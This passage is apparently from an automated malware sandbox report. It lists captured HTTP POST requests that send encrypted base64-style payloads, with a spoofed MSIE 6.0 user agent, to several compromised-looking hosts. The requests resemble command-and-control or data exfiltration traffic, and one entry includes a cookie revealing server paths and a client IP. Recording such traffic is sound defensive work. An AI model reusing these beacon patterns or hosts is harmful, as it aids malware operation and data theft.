              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fink.comCache-Control: no-cacheData Raw: 7a 34 55 52 6f 79 49 50 47 73 6d 49 65 55 43 50 6c 55 51 62 54 36 56 63 5a 4d 53 79 63 55 46 78 64 6a 64 31 62 7a 33 47 38 73 42 36 59 78 38 56 35 37 71 49 30 76 6b 34 52 42 44 69 62 72 54 66 42 32 4f 66 39 41 32 33 50 70 53 4f 2b 31 59 49 71 76 70 42 71 78 65 37 4a 49 7a 62 7a 77 4a 4f 78 68 77 30 31 41 63 36 53 67 58 56 75 4c 42 72 64 49 53 65 52 6b 4d 37 6c 35 76 38 65 4c 6a 43 46 46 6c 4f 57 5a 74 54 6e 36 53 6f 47 4b 76 58 36 65 32 2f 33 42 33 6c 45 6f 67 49 31 44 33 6f 58 6c 50 76 5a 6c 54 74 79 35 33 6b 67 5a 50 49 2b 35 75 65 2b 2f 70 2f 4a 73 79 45 57 42 5a 4e 64 49 58 4a 4a 62 76 45 52 67 64 43 58 30 30 6b 48 74 79 31 4c 54 33 50 72 64 4e 37 42 61 36 46 6a 43 6a 78 67 69 37 47 6f 70 7a 47 46 67 6b 33 41 37 33 4e 42 66 65 52 55 6e 42 4b 54 39 77 31 71 38 42 74 4d 30 78 6b 45 64 59 38 49 74 7a 44 56 54 77 64 79 31 41 42 52 52 39 44 54 58 74 33 7a 39 38 68 45 76 47 79 7a 50 30 71 38 59 4e 69 46 58 50 65 57 78 64 56 49 63 77 74 35 75 78 6a 42 45 39 2b 4f 47 6a 2f 47 47 4a 59 74 74 50 6c 76 44 65 35 7a 57 6e 4d 4e 67 43 33 47 72 34 7a 45 2b 68 57 63 42 72 41 6e 38 50 64 6b 63 55 4d 6e 4a 63 65 37 44 39 32 6e 70 2f 4d 79 57 61 72 50 67 38 75 5a 75 47 69 79 2b 62 36 4f 4b 53 67 4e 48 57 65 74 2b 69 69 54 51 54 67 69 33 70 2b 46 73 75 49 2b 62 33 4e 4a 65 5a 4d 72 66 32 44 67 65 4c 53 2f 6c 6d 6c 45 79 48 49 4a 73 35 70 78 4e 6e 45 59 4f 78 5a 45 69 47 47 64 6a 46 47 4f 68 6b 6c 79 6a 58 36 4c 54 75 55 4e 5a 37 61 64 4c 55 49 66 30 54 62 79 73 47 7a 56 31 50 70 50 32 75 74 66 4b 54 68 32 39 75 49 6c 30 68 56 69 54 48 74 64 69 38 38 51 36 78 79 58 75 39 6e 70 45 62 51 59 33 2b 4a Data Ascii: z4URoyIPGsmIeUCPlUQbT6VcZMSycUFxdjd1bz3G8sB6Yx8V57qI0vk4RBDibrTfB2Of9A23PpSO+1YIqvpBqxe7JIzbzwJOxhw01Ac6SgXVuLBrdISeRkM7l5v8eLjCFFlOWZtTn6SoGKvX6e2/3B3lEogI1D3oXlPvZlTty53kgZPI+5ue+/p/JsyEWBZNdIXJJbvERgdCX00kHty1LT3PrdN7Ba6FjCjxgi7GopzGFgk3A73NBfeRUnBKT9w1q8BtM0xkEdY8ItzDVTwdy1ABRR9DTXt3z98hEvGyzP0q8YNiFXPeWxdVIcwt5uxjBE9+OGj/GGJYttPlvDe5zWnMNgC3Gr4zE+hWcBrAn8PdkcUMnJce7D92np/MyWarPg8uZuGiy+b6OKSgNHWet+iiTQTgi3p+FsuI+b3NJeZMrf2DgeLS/lmlEyHIJs5pxNnEYOxZEiGGdjFGOhklyjX6LTuUNZ7adLUIf0TbysGzV1PpP2utfKTh29uIl0hViTHtdi88Q6xyXu9npEbQY3+J
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 52 6f 66 47 50 39 6c 6d 51 4d 6e 79 67 50 76 31 36 4b 4c 66 4b 48 49 49 51 6b 59 33 4a 53 34 6a 48 63 66 53 41 72 72 4f 7a 38 71 68 44 58 4d 52 6d 6e 32 41 6b 7a 4f 48 74 37 48 4e 51 74 6d 6f 56 33 53 53 73 4a 78 36 6b 67 67 64 55 74 6d 52 69 49 56 5a 6c 52 41 4f 73 30 6b 4d 35 34 4c 41 76 33 52 49 47 78 4c 31 48 57 54 52 2b 34 35 54 6e 79 57 4b 70 42 44 70 52 2f 77 79 54 6f 39 7a 65 6e 6a 7a 56 77 6e 77 31 4d 70 6a 6a 53 56 4d 6b 70 66 2f 6b 7a 6b 61 64 54 34 48 78 67 53 71 6a 59 74 77 30 37 32 78 6e 4a 54 75 68 50 7a 41 61 46 74 33 4f 4e 48 53 53 34 52 37 66 32 66 6b 63 48 42 57 33 49 46 67 6d 54 35 55 61 4c 4e 7a 47 67 36 31 50 62 6a 4a 79 6a 45 41 53 34 56 72 63 6b 70 31 36 4c 39 62 65 2b 4a 38 71 50 61 70 73 6c 6f 68 46 38 78 4f 50 4b 69 6f 57 61 7a 5a 71 58 42 47 6d 31 38 43 66 42 4d 4b 7a 35 5a 6b 39 79 30 74 56 71 6b 4d 63 4b 49 63 66 2f 53 70 72 61 69 39 7a 42 5a 49 4e 6d 73 51 49 73 42 4d 54 39 32 45 4e 30 45 4e 78 72 78 41 77 43 51 58 62 61 38 51 49 6d 52 6c 76 67 39 46 75 6e 63 56 61 49 39 2b 49 69 73 51 62 41 62 47 48 59 30 50 5a 7a 35 30 62 6b 55 55 6e 48 7a 71 4e 32 55 53 30 31 75 78 6c 66 4c 78 53 71 79 75 36 4e 68 6b 4b 35 32 37 42 57 66 67 62 2f 65 32 44 33 5a 74 37 64 34 73 68 75 4c 6b 61 52 45 34 77 36 45 5a 74 4a 6a 31 4f 63 4d 68 4a 4b 48 4b 36 2f 34 4c 56 59 6d 50 62 76 5a 64 44 69 35 44 33 35 70 77 2b 50 32 74 64 4c 69 48 37 5a 63 67 34 6e 41 46 4b 62 53 45 63 59 31 4b 6f 72 6a 58 6d 6f 67 44 37 34 5a 58 6a 58 56 75 77 79 4f 38 73 4a 74 74 4b 30 50 4c 72 45 45 72 5a 33 2f 44 48 52 48 39 78 4b 6d 6d 58 2f 55 36 57 47 64 61 70 66 50 66 75 68 6b 57 71 54 77 6e 71 49 31 77 45 34 70 71 56 6b 4a 48 6d 76 78 65 4a 53 43 48 77 58 7a 41 4a 6c 4d 42 58 2b 79 31 33 6a 48 5a 49 39 30 78 6c 4c 49 3d Data Ascii: RofGP9lmQMnygPv16KLfKHIIQkY3JS4jHcfSArrOz8qhDXMRmn2AkzOHt7HNQtmoV3SSsJx6kggdUtmRiIVZlRAOs0kM54LAv3RIGxL1HWTR+45TnyWKpBDpR/wyTo9zenjzVwnw1MpjjSVMkpf/kzkadT4HxgSqjYtw072xnJTuhPzAaFt3ONHSS4R7f2fkcHBW3IFgmT5UaLNzGg61PbjJyjEAS4Vrckp16L9be+J8qPapslohF8xOPKioWazZqXBGm18CfBMKz5Zk9y0tVqkMcKIcf/Sprai9zBZINmsQIsBMT92EN0ENxrxAwCQXba8QImRlvg9FuncVaI9+IisQbAbGHY0PZz50bkUUnHzqN2US01uxlfLxSqyu6NhkK527BWfgb/e2D3Zt7d4shuLkaRE4w6EZtJj1OcMhJKHK6/4LVYmPbvZdDi5D35pw+P2tdLiH7Zcg4nAFKbSEcY1KorjXmogD74ZXjXVuwyO8sJttK0PLrEErZ3/DHRH9xKmmX/U6WGdapfPfuhkWqTwnqI1wE4pqVkJHmvxeJSCHwXzAJlMBX+y13jHZI90xlLI=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nqks.comCache-Control: no-cacheData Raw: 39 4c 7a 31 66 6d 44 45 53 73 6e 6e 6f 2f 43 37 73 79 7a 5a 62 4a 4e 4f 50 70 33 49 61 6c 32 46 6c 49 6e 6c 56 72 7a 4e 4f 43 38 70 31 38 51 4a 70 71 75 4f 4b 74 70 70 50 6f 51 6b 38 35 4e 53 54 72 77 61 62 71 36 4d 50 57 52 56 79 61 51 61 6c 77 58 79 41 45 73 4f 79 76 4e 6f 50 35 70 6f 38 63 51 45 68 78 51 6c 33 43 4f 51 55 49 6a 45 30 2f 53 30 67 42 68 6d 66 58 66 58 32 65 32 74 77 31 56 66 46 74 45 44 4b 66 78 6b 2b 4d 6a 4b 63 67 70 43 6e 5a 56 32 6f 48 31 4b 45 4b 76 31 42 37 4f 66 71 48 6a 71 53 5a 76 49 78 4a 50 64 66 2f 42 6c 56 54 63 63 55 4c 41 75 5a 61 4f 53 6d 4a 4d 4f 2f 6c 47 62 65 49 4a 44 51 38 73 65 7a 36 36 7a 71 52 4e 67 70 66 67 52 55 6f 35 55 6a 66 6a 56 77 48 68 33 42 6d 37 2b 73 45 6b 62 79 4d 54 2b 5a 34 50 49 34 4e 35 6f 43 59 5a 47 4f 4d 53 71 37 69 55 37 49 53 52 4f 30 38 51 34 4e 34 75 31 63 42 35 50 43 64 74 72 34 62 78 67 67 34 6a 6a 48 31 68 58 49 64 36 38 32 74 36 52 4a 57 70 38 71 41 2f 45 71 6e 64 77 78 56 6b 64 59 51 2f 63 41 30 41 56 44 6f 6e 4f 47 6c 73 69 6c 52 37 4c 42 34 36 45 42 39 49 76 41 64 30 35 55 2f 6c 4b 50 48 49 36 53 31 34 51 44 38 77 34 62 76 38 50 31 49 78 6b 52 75 64 34 68 30 34 4d 52 63 66 56 45 66 43 5a 43 6c 57 6f 63 69 68 52 75 76 71 79 59 53 35 57 77 6f 4f 67 4c 63 4a 48 4e 4a 43 4f 54 73 55 6a 72 30 4d 50 73 32 50 69 51 65 4c 64 71 38 49 76 4e 55 77 79 61 71 31 47 5a 37 7a 6f 75 41 37 5a 51 68 49 2b 36 47 6a 64 54 6b 6a 76 72 2b 75 51 4a 46 59 51 68 53 76 38 73 49 6d 44 76 4f 34 30 4a 4d 68 34 33 31 6a 37 53 30 5a 6c 5a 48 64 7a 4a 4d 46 53 49 72 6a 51 42 6e 6c 6a 6f 78 39 43 45 48 65 6f 4f 34 74 53 73 43 7a 48 79 46 4d 66 54 48 6b 32 4f 59 73 2f 38 62 70 33 57 57 72 51 6b 42 77 38 4f 53 67 59 68 67 3d 3d Data Ascii: 9Lz1fmDESsnno/C7syzZbJNOPp3Ial2FlInlVrzNOC8p18QJpquOKtppPoQk85NSTrwabq6MPWRVyaQalwXyAEsOyvNoP5po8cQEhxQl3COQUIjE0/S0gBhmfXfX2e2tw1VfFtEDKfxk+MjKcgpCnZV2oH1KEKv1B7OfqHjqSZvIxJPdf/BlVTccULAuZaOSmJMO/lGbeIJDQ8sez66zqRNgpfgRUo5UjfjVwHh3Bm7+sEkbyMT+Z4PI4N5oCYZGOMSq7iU7ISRO08Q4N4u1cB5PCdtr4bxgg4jjH1hXId682t6RJWp8qA/EqndwxVkdYQ/cA0AVDonOGlsilR7LB46EB9IvAd05U/lKPHI6S14QD8w4bv8P1IxkRud4h04MRcfVEfCZClWocihRuvqyYS5WwoOgLcJHNJCOTsUjr0MPs2PiQeLdq8IvNUwyaq1GZ7zouA7ZQhI+6GjdTkjvr+uQJFYQhSv8sImDvO40JMh431j7S0ZlZHdzJMFSIrjQBnljox9CEHeoO4tSsCzHyFMfTHk2OYs/8bp3WWrQkBw8OSgYhg==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.spanesi.comCache-Control: no-cacheData Raw: 64 71 53 4d 66 61 61 34 53 73 6b 6e 42 77 77 57 51 58 63 43 51 38 6d 30 54 31 4b 47 67 39 59 47 4f 68 64 66 4e 34 6b 41 47 63 55 76 73 71 63 71 67 73 44 78 53 6b 68 5a 53 67 47 55 6d 57 31 53 69 44 77 47 4a 6e 53 67 67 43 61 52 68 51 50 63 68 50 6f 7a 66 79 53 49 2f 7a 61 54 50 4f 6a 75 57 6a 50 77 49 68 2f 62 6e 61 30 59 30 67 66 4f 65 32 43 69 78 70 64 4e 51 4f 58 4f 61 56 30 74 70 42 46 5a 79 69 58 71 78 65 73 7a 7a 33 31 42 6d 6c 6d 77 78 42 66 69 34 77 54 34 50 71 55 6e 74 49 47 74 62 5a 73 37 69 2f 56 37 46 79 51 6d 4f 37 51 4a 79 55 47 4a 53 41 69 73 4b 6d 76 41 4b 5a 4f 48 36 64 48 76 39 71 52 33 46 6c 79 73 70 55 74 5a 36 70 4b 33 43 4a 70 72 55 4f 54 46 4c 38 32 49 73 6a 37 4a 41 32 4e 41 75 2b 73 63 64 4c 63 50 53 59 33 5a 45 78 41 34 47 41 2f 38 79 76 4a 6b 4f 79 77 75 79 6a 47 54 79 59 32 62 43 38 73 4d 77 78 4d 32 58 57 58 43 30 68 45 33 35 4b 30 55 74 37 62 46 37 4d 51 6f 77 4c 57 76 30 6b 71 7a 43 64 6b 73 45 68 67 64 63 4c 62 46 5a 74 39 63 76 58 55 5a 70 6c 68 63 75 5a 43 62 75 73 48 6a 69 35 69 76 2f 6b 77 76 43 48 61 79 77 59 37 51 67 78 44 34 2f 4d 6f 4d 59 2b 37 44 66 71 38 74 34 30 6c 47 4a 47 6b 4d 77 6b 53 55 70 30 64 6d 43 78 53 45 46 37 66 5a 48 51 61 34 56 74 37 53 2b 61 45 43 31 77 49 50 51 50 58 69 70 6e 73 78 56 73 36 72 36 70 79 39 59 35 68 75 77 66 44 4f 4f 44 2b 32 57 32 53 4f 31 74 78 7a 67 54 67 52 62 50 52 37 74 4e 49 55 4d 62 4e 77 51 46 4e 31 6d 6b 45 34 64 31 47 63 49 75 61 2f 41 45 6e 51 58 66 45 56 57 2f 67 37 42 6d 74 69 35 56 44 59 61 51 4e 68 4a 35 47 65 4f 30 63 43 6d 4d 51 67 6a 6c 37 35 36 63 2b 70 42 41 5a 32 31 38 48 70 4d 50 49 4b 52 32 6e 35 34 64 4b 36 38 52 46 45 49 6a 50 5a 6c 51 3d 3d Data Ascii: dqSMfaa4SsknBwwWQXcCQ8m0T1KGg9YGOhdfN4kAGcUvsqcqgsDxSkhZSgGUmW1SiDwGJnSggCaRhQPchPozfySI/zaTPOjuWjPwIh/bna0Y0gfOe2CixpdNQOXOaV0tpBFZyiXqxeszz31BmlmwxBfi4wT4PqUntIGtbZs7i/V7FyQmO7QJyUGJSAisKmvAKZOH6dHv9qR3FlyspUtZ6pK3CJprUOTFL82Isj7JA2NAu+scdLcPSY3ZExA4GA/8yvJkOywuyjGTyY2bC8sMwxM2XWXC0hE35K0Ut7bF7MQowLWv0kqzCdksEhgdcLbFZt9cvXUZplhcuZCbusHji5iv/kwvCHaywY7QgxD4/MoMY+7Dfq8t40lGJGkMwkSUp0dmCxSEF7fZHQa4Vt7S+aEC1wIPQPXipnsxVs6r6py9Y5huwfDOOD+2W2SO1txzgTgRbPR7tNIUMbNwQFN1mkE4d1GcIua/AEnQXfEVW/g7Bmti5VDYaQNhJ5GeO0cCmMQgjl756c+pBAZ218HpMPIKR2n54dK68RFEIjPZlQ==
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 52 6f 66 47 50 39 6c 6d 51 4d 6e 79 67 50 76 31 36 4b 4c 66 4b 48 49 49 51 6b 59 33 4a 53 34 6a 48 63 66 53 41 72 72 4f 7a 38 71 68 44 58 4d 52 6d 6e 32 41 6b 7a 4f 48 74 37 48 4e 51 74 6d 6f 56 33 53 53 73 4a 78 36 6b 67 67 64 55 74 6d 52 69 49 56 5a 6c 52 41 4f 73 30 6b 4d 35 34 4c 41 76 33 52 49 47 78 4c 31 48 57 54 52 2b 34 35 54 6e 79 57 4b 70 42 44 70 52 2f 77 79 54 6f 39 7a 65 6e 6a 7a 56 77 6e 77 31 4d 70 6a 6a 53 56 4d 6b 70 66 2f 6b 7a 6b 61 64 54 34 48 78 67 53 71 6a 59 74 77 30 37 32 78 6e 4a 54 75 68 50 7a 41 61 46 74 33 4f 4e 48 53 53 34 52 37 66 32 66 6b 63 48 42 57 33 49 46 67 6d 54 35 55 61 4c 4e 7a 47 67 36 31 50 62 6a 4a 79 6a 45 41 53 34 56 72 63 6b 70 31 36 4c 39 62 65 2b 4a 38 71 50 61 70 73 6c 6f 68 46 38 78 4f 50 4b 69 6f 57 61 7a 5a 71 58 42 47 6d 31 38 43 66 42 4d 4b 7a 35 5a 6b 39 79 30 74 56 71 6b 4d 63 4b 49 63 66 2f 53 70 72 61 69 39 7a 42 5a 49 4e 6d 73 51 49 73 42 4d 54 39 32 45 4e 30 45 4e 78 72 78 41 77 43 51 58 62 61 38 51 49 6d 52 6c 76 67 39 46 75 6e 63 56 61 49 39 2b 49 69 73 51 62 41 62 47 48 59 30 50 5a 7a 35 30 62 6b 55 55 6e 48 7a 71 4e 32 55 53 30 31 75 78 6c 66 4c 78 53 71 79 75 36 4e 68 6b 4b 35 32 37 42 57 66 67 62 2f 65 32 44 33 5a 74 37 64 34 73 68 75 4c 6b 61 52 45 34 77 36 45 5a 74 4a 6a 31 4f 63 4d 68 4a 4b 48 4b 36 2f 34 4c 56 59 6d 50 62 76 5a 64 44 69 35 44 33 35 70 77 2b 50 32 74 64 4c 69 48 37 5a 63 67 34 6e 41 46 4b 62 53 45 63 59 31 4b 6f 72 6a 58 6d 6f 67 44 37 34 5a 58 6a 58 56 75 77 79 4f 38 73 4a 74 74 4b 30 50 4c 72 45 45 72 5a 33 2f 44 48 52 48 39 78 4b 6d 6d 58 2f 55 36 57 47 64 61 70 66 50 66 75 68 6b 57 71 54 77 6e 71 49 31 77 45 34 70 71 56 6b 4a 48 6d 76 78 65 4a 53 43 48 77 58 7a 41 4a 6c 4d 42 58 2b 79 31 33 6a 48 5a 49 39 30 78 6c 4c 49 3d Data Ascii: RofGP9lmQMnygPv16KLfKHIIQkY3JS4jHcfSArrOz8qhDXMRmn2AkzOHt7HNQtmoV3SSsJx6kggdUtmRiIVZlRAOs0kM54LAv3RIGxL1HWTR+45TnyWKpBDpR/wyTo9zenjzVwnw1MpjjSVMkpf/kzkadT4HxgSqjYtw072xnJTuhPzAaFt3ONHSS4R7f2fkcHBW3IFgmT5UaLNzGg61PbjJyjEAS4Vrckp16L9be+J8qPapslohF8xOPKioWazZqXBGm18CfBMKz5Zk9y0tVqkMcKIcf/Sprai9zBZINmsQIsBMT92EN0ENxrxAwCQXba8QImRlvg9FuncVaI9+IisQbAbGHY0PZz50bkUUnHzqN2US01uxlfLxSqyu6NhkK527BWfgb/e2D3Zt7d4shuLkaRE4w6EZtJj1OcMhJKHK6/4LVYmPbvZdDi5D35pw+P2tdLiH7Zcg4nAFKbSEcY1KorjXmogD74ZXjXVuwyO8sJttK0PLrEErZ3/DHRH9xKmmX/U6WGdapfPfuhkWqTwnqI1wE4pqVkJHmvxeJSCHwXzAJlMBX+y13jHZI90xlLI=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 52 6f 66 47 50 39 6c 6d 51 4d 6e 79 67 50 76 31 36 4b 4c 66 4b 48 49 49 51 6b 59 33 4a 53 34 6a 48 63 66 53 41 72 72 4f 7a 38 71 68 44 58 4d 52 6d 6e 32 41 6b 7a 4f 48 74 37 48 4e 51 74 6d 6f 56 33 53 53 73 4a 78 36 6b 67 67 64 55 74 6d 52 69 49 56 5a 6c 52 41 4f 73 30 6b 4d 35 34 4c 41 76 33 52 49 47 78 4c 31 48 57 54 52 2b 34 35 54 6e 79 57 4b 70 42 44 70 52 2f 77 79 54 6f 39 7a 65 6e 6a 7a 56 77 6e 77 31 4d 70 6a 6a 53 56 4d 6b 70 66 2f 6b 7a 6b 61 64 54 34 48 78 67 53 71 6a 59 74 77 30 37 32 78 6e 4a 54 75 68 50 7a 41 61 46 74 33 4f 4e 48 53 53 34 52 37 66 32 66 6b 63 48 42 57 33 49 46 67 6d 54 35 55 61 4c 4e 7a 47 67 36 31 50 62 6a 4a 79 6a 45 41 53 34 56 72 63 6b 70 31 36 4c 39 62 65 2b 4a 38 71 50 61 70 73 6c 6f 68 46 38 78 4f 50 4b 69 6f 57 61 7a 5a 71 58 42 47 6d 31 38 43 66 42 4d 4b 7a 35 5a 6b 39 79 30 74 56 71 6b 4d 63 4b 49 63 66 2f 53 70 72 61 69 39 7a 42 5a 49 4e 6d 73 51 49 73 42 4d 54 39 32 45 4e 30 45 4e 78 72 78 41 77 43 51 58 62 61 38 51 49 6d 52 6c 76 67 39 46 75 6e 63 56 61 49 39 2b 49 69 73 51 62 41 62 47 48 59 30 50 5a 7a 35 30 62 6b 55 55 6e 48 7a 71 4e 32 55 53 30 31 75 78 6c 66 4c 78 53 71 79 75 36 4e 68 6b 4b 35 32 37 42 57 66 67 62 2f 65 32 44 33 5a 74 37 64 34 73 68 75 4c 6b 61 52 45 34 77 36 45 5a 74 4a 6a 31 4f 63 4d 68 4a 4b 48 4b 36 2f 34 4c 56 59 6d 50 62 76 5a 64 44 69 35 44 33 35 70 77 2b 50 32 74 64 4c 69 48 37 5a 63 67 34 6e 41 46 4b 62 53 45 63 59 31 4b 6f 72 6a 58 6d 6f 67 44 37 34 5a 58 6a 58 56 75 77 79 4f 38 73 4a 74 74 4b 30 50 4c 72 45 45 72 5a 33 2f 44 48 52 48 39 78 4b 6d 6d 58 2f 55 36 57 47 64 61 70 66 50 66 75 68 6b 57 71 54 77 6e 71 49 31 77 45 34 70 71 56 6b 4a 48 6d 76 78 65 4a 53 43 48 77 58 7a 41 4a 6c 4d 42 58 2b 79 31 33 6a 48 5a 49 39 30 78 6c 4c 49 3d Data Ascii: RofGP9lmQMnygPv16KLfKHIIQkY3JS4jHcfSArrOz8qhDXMRmn2AkzOHt7HNQtmoV3SSsJx6kggdUtmRiIVZlRAOs0kM54LAv3RIGxL1HWTR+45TnyWKpBDpR/wyTo9zenjzVwnw1MpjjSVMkpf/kzkadT4HxgSqjYtw072xnJTuhPzAaFt3ONHSS4R7f2fkcHBW3IFgmT5UaLNzGg61PbjJyjEAS4Vrckp16L9be+J8qPapslohF8xOPKioWazZqXBGm18CfBMKz5Zk9y0tVqkMcKIcf/Sprai9zBZINmsQIsBMT92EN0ENxrxAwCQXba8QImRlvg9FuncVaI9+IisQbAbGHY0PZz50bkUUnHzqN2US01uxlfLxSqyu6NhkK527BWfgb/e2D3Zt7d4shuLkaRE4w6EZtJj1OcMhJKHK6/4LVYmPbvZdDi5D35pw+P2tdLiH7Zcg4nAFKbSEcY1KorjXmogD74ZXjXVuwyO8sJttK0PLrEErZ3/DHRH9xKmmX/U6WGdapfPfuhkWqTwnqI1wE4pqVkJHmvxeJSCHwXzAJlMBX+y13jHZI90xlLI=
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.myropcb.comCache-Control: no-cacheCookie: myro_ct_dtl=eyJSRVFVRVNUX1VSSSI6IlwvIiwiUkVESVJFQ1RfVU5JUVVFX0lEIjoiWlFQcTllMUhuNGtUcTMtXzF3WXVEZ0FBQUR3IiwiUkVESVJFQ1RfU0NSSVBUX1VSTCI6IlwvIiwiUkVESVJFQ1RfU0NSSVBUX1VSSSI6Imh0dHA6XC9cL3d3dy5teXJvcGNiLmNvbVwvIiwiUkVESVJFQ1RfRE9DVU1FTlRfUk9PVCI6Ilwva3VuZGVuXC9ob21lcGFnZXNcLzlcL2QzMjgxNTE4NDdcL2h0ZG9jc1wvY2xpY2thbmRidWlsZHNcL215cm9wY2IiLCJSRURJUkVDVF9IVFRQX0FVVEhPUklaQVRJT04iOiIiLCJSRURJUkVDVF9IQU5ETEVSIjoieC1tYXBwLXBocDUiLCJSRURJUkVDVF9TVEFUVVMiOiIyMDAiLCJVTklRVUVfSUQiOiJaUVBxOWUxSG40a1RxMy1fMXdZdURnQUFBRHciLCJTQ1JJUFRfVVJMIjoiXC8iLCJTQ1JJUFRfVVJJIjoiaHR0cDpcL1wvd3d3Lm15cm9wY2IuY29tXC8iLCJIVFRQX0hPU1QiOiJ3d3cubXlyb3BjYi5jb20iLCJDT05URU5UX0xFTkdUSCI6IjU3NiIsIkhUVFBfQUNDRVBUIjoiKlwvKiIsIkhUVFBfQUNDRVBUX0xBTkdVQUdFIjoiZW4tdXMiLCJDT05URU5UX1RZUEUiOiJhcHBsaWNhdGlvblwvb2N0ZXQtc3RyZWFtIiwiSFRUUF9VU0VSX0FHRU5UIjoiTW96aWxsYVwvNC4wIChjb21wYXRpYmxlOyBNU0lFIDYuMDsgV2luZG93cyBOVCA1LjE7IFNWMSkiLCJIVFRQX0NBQ0hFX0NPTlRST0wiOiJuby1jYWNoZSIsIlJFTU9URV9BRERSIjoiMTkxLjk2LjE1MC4yMDkiLCJSRVFVRVNUX1NDSEVNRSI6Imh0dHAiLCJDT05URVhUX1BSRUZJWCI6Ilwvc3lzdGVtLWJpblwvIiwiQ09OVEVYVF9ET0NVTUVOVF9ST09UIjoiXC9rdW5kZW5cL3VzclwvbGliXC9jZ2ktYmluXC8iLCJSRU1PVEVfUE9SVCI6IjIwNDIyIiwiUkVESVJFQ1RfVVJMIjoiXC9pbmRleC5waHAiLCJSRVFVRVNUX01FVEhPRCI6IlBPU1QiLCJRVUVSWV9TVFJJTkciOiIiLCJTQ1JJUFRfTkFNRSI6IlwvaW5kZXgucGhwIiwiU1RBVFVTIjoiMjAwIiwiT1JJR19QQVRIX0lORk8iOiJcL2luZGV4LnBocCIsIk9SSUdfUEFUSF9UUkFOU0xBVEVEIjoiXC9rdW5kZW5cL2hvbWVwYWdlc1wvOVwvZDMyODE1MTg0N1wvaHRkb2NzXC9jbGlja2FuZGJ1aWxkc1wvbXlyb3BjYlwvaW5kZXgucGhwIiwiUEhQX1NFTEYiOiJcL2luZGV4LnBocCIsIlJFUVVFU1RfVElNRV9GTE9BVCI6MTY5NDc1NTU3My4yODU0MDMsIlJFUVVFU1RfVElNRSI6MTY5NDc1NTU3MywiYXJndiI6W10sImFyZ2MiOjB9; myro_ct=eyJ1cmwiOiIiLCJpcCI6IjE5MS45Ni4xNTAuMjA5In0%3D; shield-notbot-nonce=baba4ffe82
              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 52 6f 66 47 50 39 6c 6d 51 4d 6e 79 67 50 76 31 36 4b 4c 66 4b 48 49 49 51 6b 59 33 4a 53 34 6a 48 63 66 53 41 72 72 4f 7a 38 71 68 44 58 4d 52 6d 6e 32 41 6b 7a 4f 48 74 37 48 4e 51 74 6d 6f 56 33 53 53 73 4a 78 36 6b 67 67 64 55 74 6d 52 69 49 56 5a 6c 52 41 4f 73 30 6b 4d 35 34 4c 41 76 33 52 49 47 78 4c 31 48 57 54 52 2b 34 35 54 6e 79 57 4b 70 42 44 70 52 2f 77 79 54 6f 39 7a 65 6e 6a 7a 56 77 6e 77 31 4d 70 6a 6a 53 56 4d 6b 70 66 2f 6b 7a 6b 61 64 54 34 48 78 67 53 71 6a 59 74 77 30 37 32 78 6e 4a 54 75 68 50 7a 41 61 46 74 33 4f 4e 48 53 53 34 52 37 66 32 66 6b 63 48 42 57 33 49 46 67 6d 54 35 55 61 4c 4e 7a 47 67 36 31 50 62 6a 4a 79 6a 45 41 53 34 56 72 63 6b 70 31 36 4c 39 62 65 2b 4a 38 71 50 61 70 73 6c 6f 68 46 38 78 4f 50 4b 69 6f 57 61 7a 5a 71 58 42 47 6d 31 38 43 66 42 4d 4b 7a 35 5a 6b 39 79 30 74 56 71 6b 4d 63 4b 49 63 66 2f 53 70 72 61 69 39 7a 42 5a 49 4e 6d 73 51 49 73 42 4d 54 39 32 45 4e 30 45 4e 78 72 78 41 77 43 51 58 62 61 38 51 49 6d 52 6c 76 67 39 46 75 6e 63 56 61 49 39 2b 49 69 73 51 62 41 62 47 48 59 30 50 5a 7a 35 30 62 6b 55 55 6e 48 7a 71 4e 32 55 53 30 31 75 78 6c 66 4c 78 53 71 79 75 36 4e 68 6b 4b 35 32 37 42 57 66 67 62 2f 65 32 44 33 5a 74 37 64 34 73 68 75 4c 6b 61 52 45 34 77 36 45 5a 74 4a 6a 31 4f 63 4d 68 4a 4b 48 4b 36 2f 34 4c 56 59 6d 50 62 76 5a 64 44 69 35 44 33 35 70 77 2b 50 32 74 64 4c 69 48 37 5a 63 67 34 6e 41 46 4b 62 53 45 63 59 31 4b 6f 72 6a 58 6d 6f 67 44 37 34 5a 58 6a 58 56 75 77 79 4f 38 73 4a 74 74 4b 30 50 4c 72 45 45 72 5a 33 2f 44 48 52 48 39 78 4b 6d 6d 58 2f 55 36 57 47 64 61 70 66 50 66 75 68 6b 57 71 54 77 6e 71 49 31 77 45 34 70 71 56 6b 4a 48 6d 76 78 65 4a 53 43 48 77 58 7a 41 4a 6c 4d 42 58 2b 79 31 33 6a 48 5a 49 39 30 78 6c 